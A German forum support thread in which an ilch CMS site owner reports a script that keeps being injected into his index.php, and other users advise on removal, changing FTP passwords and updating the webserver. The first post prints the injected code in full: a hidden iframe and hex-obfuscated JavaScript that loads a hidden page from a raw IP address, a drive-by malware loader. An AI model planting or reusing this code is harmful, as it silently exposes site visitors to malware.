ilch Forum » Ilch Clan 1.1 » Fehlersuche und Probleme » Script Virus?

Geschlossen
  1. #1
    User Pic
    Hassmann Mitglied
    Registriert seit
    13.02.2008
    Beiträge
    1.591
    Beitragswertungen
    9 Beitragspunkte
    Hallo,
    ich hab nen problem! Immer wenni ch die seite öffne wird mir ein virus angezeigt! Unter dem html tag is ein Script
    <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47b45f81256da(v47b45f8125ead){ function v47b45f812667c () {return 16;} return(parseInt(v47b45f8125ead,v47b45f812667c()));}function v47b45f812761b(v47b45f8127df7){ function v47b45f8129556 () {var v47b45f8129d35=2; return v47b45f8129d35;} var v47b45f81285eb='';for(v47b45f8128d8c=0; v47b45f8128d8c<v47b45f8127df7.length; v47b45f8128d8c+=v47b45f8129556()){ v47b45f81285eb+=(String.fromCharCode(v47b45f81256da(v47b45f8127df7.substr(v47b45f8128d8c, v47b45f8129556()))));}return v47b45f81285eb;} document.write(v47b45f812761b('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D643364633761207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A333230393530292B273433336661625C272077696474683D363535206865696768743D343930207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

    Ich lösche ihr immer weider raus aber nein, er kommt imma wiedre! bitte hilfe! :*-


    verwendete ilchClan Version: 1.1

    betroffene Homepage: externer Link
    Sub2Go.NET | Kostenlosen Webspace mit vielen features! Für Ilch-Forumsmitglieder doppelten Speicher!
    Mave1993.de Blog
    0 Mitglieder finden den Beitrag gut.
  2. #2
    User Pic
    assault Hall Of Fame
    Registriert seit
    03.11.2006
    Beiträge
    2.925
    Beitragswertungen
    1 Beitragspunkte
    hm, ich dachte das ding wäre in die ewigen Jagdgründe eingegangen^^

    den code löschen, wurde in boxes/login.php und im design gefunden, dann ftp-kennwort ändern... sonst mal sufu nutzen

    ...oder isses was anderes?... hmm, sonst hier wieder melden
    0 Mitglieder finden den Beitrag gut.
  3. #3
    User Pic
    Hassmann Mitglied
    Registriert seit
    13.02.2008
    Beiträge
    1.591
    Beitragswertungen
    9 Beitragspunkte
    lol nee is in der haupt datei (index.php) unter ?> {SCRIPT} ^^ also unter dem php tag-ende!
    Sub2Go.NET | Kostenlosen Webspace mit vielen features! Für Ilch-Forumsmitglieder doppelten Speicher!
    Mave1993.de Blog
    0 Mitglieder finden den Beitrag gut.
  4. #4
    User Pic
    Hassmann Mitglied
    Registriert seit
    13.02.2008
    Beiträge
    1.591
    Beitragswertungen
    9 Beitragspunkte
    ausserdem was is das für ein script? cms fehler?
    Sub2Go.NET | Kostenlosen Webspace mit vielen features! Für Ilch-Forumsmitglieder doppelten Speicher!
    Mave1993.de Blog
    0 Mitglieder finden den Beitrag gut.
  5. #5
    User Pic
    Ithron Hall Of Fame
    Registriert seit
    21.01.2006
    Beiträge
    2.659
    Beitragswertungen
    24 Beitragspunkte
    Die Zeile {SCRIPT} wurde wohl von nem Bot / Cracker reingesetzt.

    Die Definition müsste in include/includes/func/design.php stehen.
    ZitatZitat geschrieben von loW

    Ja ich habs gesehen und wenn ichs kostenlos bekomm dann zahl ich doch nix dafür oder?
    0 Mitglieder finden den Beitrag gut.
  6. #6
    User Pic
    Hassmann Mitglied
    Registriert seit
    13.02.2008
    Beiträge
    1.591
    Beitragswertungen
    9 Beitragspunkte
    hab garkeine design.php ^^
    Sub2Go.NET | Kostenlosen Webspace mit vielen features! Für Ilch-Forumsmitglieder doppelten Speicher!
    Mave1993.de Blog
    0 Mitglieder finden den Beitrag gut.
  7. #7
    User Pic
    Ithron Hall Of Fame
    Registriert seit
    21.01.2006
    Beiträge
    2.659
    Beitragswertungen
    24 Beitragspunkte
    stimmt, ist auch unter include/includes/class/design.php

    Aber wir wissen ja mittlerweile was du meinst (für alle anderen, er hat {SCRIPT} als platzhalter geschrieben, original stand da direkt der iframe).
    ZitatZitat geschrieben von loW

    Ja ich habs gesehen und wenn ichs kostenlos bekomm dann zahl ich doch nix dafür oder?
    0 Mitglieder finden den Beitrag gut.
  8. #8
    User Pic
    Ahrta5 Moderator
    Registriert seit
    17.12.2007
    Beiträge
    2.368
    Beitragswertungen
    210 Beitragspunkte
    naja ich hatte auch sowas ähnliches und zwar immer wenn ich eine index datei aufgerufen habe... ein bot oder sowas hat mal auf meinem webspace in jede index datei ein "Script" reingeschrieben, der mein Antivir eine Virusmeldung mit einem Trojaner hervorrufen lies...

    naja habs gelöscht und keine probleme mehr gehabt^^
    0 Mitglieder finden den Beitrag gut.
  9. #9
    User Pic
    Hassmann Mitglied
    Registriert seit
    13.02.2008
    Beiträge
    1.591
    Beitragswertungen
    9 Beitragspunkte
    bei mir kommts imma wieder
    Sub2Go.NET | Kostenlosen Webspace mit vielen features! Für Ilch-Forumsmitglieder doppelten Speicher!
    Mave1993.de Blog
    0 Mitglieder finden den Beitrag gut.
  10. #10
    User Pic
    HeX Hall Of Fame
    Registriert seit
    14.01.2006
    Beiträge
    2.113
    Beitragswertungen
    1 Beitragspunkte
    dann update mal dein webserver, falls du es nicht kannst dann frag mal beim deinem hoster nach nem update oder wechsel ihn einfach... der fehler liegt nicht im script sondern im webserver
    Discite moniti!
    www.pixelbash.de
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Fehlersuche und Probleme

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten